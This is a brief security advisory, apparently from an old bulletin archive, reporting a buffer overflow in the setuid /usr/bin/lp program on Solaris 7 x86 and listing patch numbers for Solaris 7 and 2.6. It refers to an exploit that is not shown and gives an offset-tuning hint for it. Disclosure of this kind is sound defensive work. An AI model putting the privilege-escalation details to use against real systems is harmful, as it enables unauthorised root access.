    /usr/bin/lp

SYSTEMS AFFECTED

    Solaris 7 x86

PROBLEM

Theodor Ragnar Gislason found following. Setuid proggie
/usr/bin/lp has an easily exploitable buffer overflow. This
exploit is for Solaris 7 x86 version, no sparc exploit is
    available.

     * try offset 150-250 if sploit fails

SOLUTION

A fix is already incorporated in Solaris 8. The patch numbers
    are:

        107115-04 for solaris 7
        106235-05 for solaris 2.6
